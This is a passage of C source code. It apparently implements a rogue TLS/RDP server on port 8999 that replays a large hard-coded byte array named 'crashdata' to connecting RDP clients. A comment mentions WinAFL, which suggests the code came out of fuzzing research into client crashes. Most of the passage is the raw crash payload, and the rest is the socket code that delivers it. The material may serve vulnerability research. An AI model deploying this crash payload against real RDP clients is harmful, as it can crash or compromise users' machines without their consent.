	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0x16, 0x7D, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xEE, 0x22, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0xB8, 0x9D, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0x90, 0x43, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0x0A, 0x85, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0x8B, 0x1A, 0xAE, 0x12, 0x08, 0x80, 0x0A, 0xB4, 
	0x6C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF5, 0x7C, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x12, 0x70, 0x33, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xD6, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 
	0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x12, 0x12, 0x4C, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x36, 0x8D, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0x0C, 0x82, 0xE9, 0x2A, 0x8D, 0x12, 0x08, 0x80, 0x0D, 0x5A, 0xB6, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xB1, 0x43, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x12, 0xCE, 0x12, 0x5D, 0xE7, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0x97, 0x95, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x12, 0xCE, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFC, 0xD6, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0xCE, 0x12, 0xCE, 0x12, 0x09, 0x82, 0x88, 0x43, 0x4C, 0x12, 0x06, 0x80, 0x0C, 0xCF, 
	0x12, 0xCE, 0x12, 0xBE, 0xF7, 0xFF, 0xFF, 0xFF, 0xFF, 0x5D, 0xE7, 0xAE, 0x12, 0xCE, 0x12, 0xCE, 
	0x12, 0xCF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 
	0x12, 0xB8, 0x9D, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF2, 0x4B, 0xAE, 0x12, 0xCE, 
	0x12, 0xCE, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 
	0x12, 0xBB, 0xC6, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xEF, 0x22, 0xAD, 0x12, 0xB1, 0x43, 0xBE, 
	0xF7, 0xFF, 0xFF, 0x5D, 0xE7, 0x50, 0x33, 0x0C, 0x82, 0x67, 0x5C, 0xAD, 0x1A, 0x06, 0x80, 0x0F, 
	0xCF, 0x1A, 0x13, 0x54, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x19, 0xA6, 0xCE, 0x12, 0xCE, 0x12, 
	0xCF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xCF, 0x12, 0x74, 0x5C, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xCE, 0x12, 0xCE, 0x12, 
	0xCE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xCF, 0x12, 0x16, 0x7D, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xB4, 0x6C, 0xAE, 0x12, 0x5A, 0xB6, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x56, 0x8D, 0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x12, 0x09, 0x91, 
	0x8A, 0x6C, 0x2E, 0x2B, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xB8, 0x9D, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x74, 0x5C, 0xCE, 0x12, 0xCF, 0x12, 
	0xCF, 0x1A, 0x68, 0xEF, 0x1A, 0x88, 0xCF, 0x12, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x5A, 0xB6, 
	0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0x68, 0xEF, 0x1A, 0x8E, 0xD2, 0x43, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xF9, 0xA5, 0xCE, 0x12, 0x5A, 0xB6, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x57, 0x8D, 
	0xCE, 0x12, 0xCE, 0x12, 0xCF, 0x1A, 0x73, 0xEF, 0x1A, 0x85, 0xCF, 0x1A, 0xCF, 0x12, 0xCF, 0x12, 
	0xCF, 0x12, 0xCF, 0x1A, 0x6B, 0xEF, 0x1A, 0x85, 0xCF, 0x1A, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 0x12, 
	0xCF, 0x12, 0x6B, 0xEF, 0x1A, 0x8C, 0xCF, 0x1A, 0xCF, 0x12, 0xCF, 0x12, 0xCE, 0x12, 0xCE, 0x12, 
	0xD1, 0x43, 0xBE, 0xF7, 0xFF, 0xFF, 0x5D, 0xE7, 0x70, 0x33, 0xCE, 0x12, 0xCF, 0x12, 0x60, 0x18, 
	0xEF, 0x1A, 0x87, 0xCF, 0x1A, 0xCF, 0x12, 0xCF, 0x12, 0xD2, 0x43, 0xCF, 0x12, 0xCF, 0x12, 0xCF, 
	0x1A, 0xF3, 0x87, 0x02, 0xEF, 0x1A, 0x84, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0x51, 
	0x02, 0x40
};

	
	//respose_to_rdp_client(crashdata1, 3090);
	respose_to_rdp_client(crashdata, 14359);

	int i = 0;
	int length = 0;
	while (1)
	{
		channel = 0;
		length = 0;
		length = ssl_recv_loop(recvbuf, &channel);
		if (!length)
			return 0;

		if (channel == 0xef)
		{
			i++;
		}
		printf("channel = %x\n", channel);
	}

	// all over
	return 0;
}

DWORD WINAPI accept_handle_connection() {
	ClientSocket = accept(ListenSocket, NULL, NULL);
	if (ClientSocket == INVALID_SOCKET) {
		printf("accept failed with error: %d\n", WSAGetLastError());
		return 1;
	}

	if (start_establish() == -1)
	{
		printf("start establish failed!!!\n");
		return -1;
	}

	if (ssl_established() == -1)
	{
		printf("ssl establish failed!!!\n");;
		return -1;
	}

	recv_loop();
	return 0;
}

int APIENTRY dll_run() {
	/* we have to create a second thread to avoid blocking winAFL in recv */

	ssl_clear();
	if (hr != NULL)
		if (WaitForSingleObject(hr, 0) != WAIT_OBJECT_0)
		{
			TerminateThread(hr, 0);
		}

	accept_handle_connection();

	return 1;
}

int dll_init() {
	static WSADATA wsaData;
	static int iResult;
	static struct addrinfo *result = NULL;
	static struct addrinfo hints;
	static int iSendResult;

	unsigned char server_bind_port[] = "8999";

	SSL_library_init();
	OpenSSL_add_all_algorithms();
	SSL_load_error_strings();
	ctx = SSL_CTX_new(TLSv1_server_method());

	if (SSL_CTX_use_certificate_file(ctx, ".\\ca\\cacert.pem", SSL_FILETYPE_PEM) <= 0)
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}
	if (SSL_CTX_use_PrivateKey_file(ctx, ".\\ca\\privkey.pem", SSL_FILETYPE_PEM) <= 0)
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}
	if (!SSL_CTX_check_private_key(ctx))
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}

	// Initialize Winsock
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed with error: %d\n", iResult);
		return 0;
	}

	ZeroMemory(&hints, sizeof(hints));
	hints.ai_family = AF_INET;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;
	hints.ai_flags = AI_PASSIVE;

	// Resolve the server address and port
	iResult = getaddrinfo(NULL, (PCSTR)server_bind_port, &hints, &result);
	if (iResult != 0) {
		printf("getaddrinfo failed with error: %d\n", iResult);
		WSACleanup();
		return 0;
	}

	// Create a SOCKET for connecting to server
	ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
	if (ListenSocket == INVALID_SOCKET) {
		printf("socket failed with error: %ld\n", WSAGetLastError());
		freeaddrinfo(result);
		WSACleanup();
		return 0;
	}

	// Setup the TCP listening socket
	iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen);
	if (iResult == SOCKET_ERROR) {
		printf("bind failed with error: %d\n", WSAGetLastError());
		freeaddrinfo(result);
		closesocket(ListenSocket);
		WSACleanup();
		return 0;
	}

	freeaddrinfo(result);

	iResult = listen(ListenSocket, SOMAXCONN);
	if (iResult == SOCKET_ERROR) {
		printf("listen failed with error: %d\n", WSAGetLastError());
		closesocket(ListenSocket);
		WSACleanup();
		ExitProcess(-1);
		return 0;
	}
	printf("init finished\n");
	return 1;
}


int main(int argc, char* argv[]) {
	printf("start\n");
	dll_init();
	dll_run();
	return 0;
}

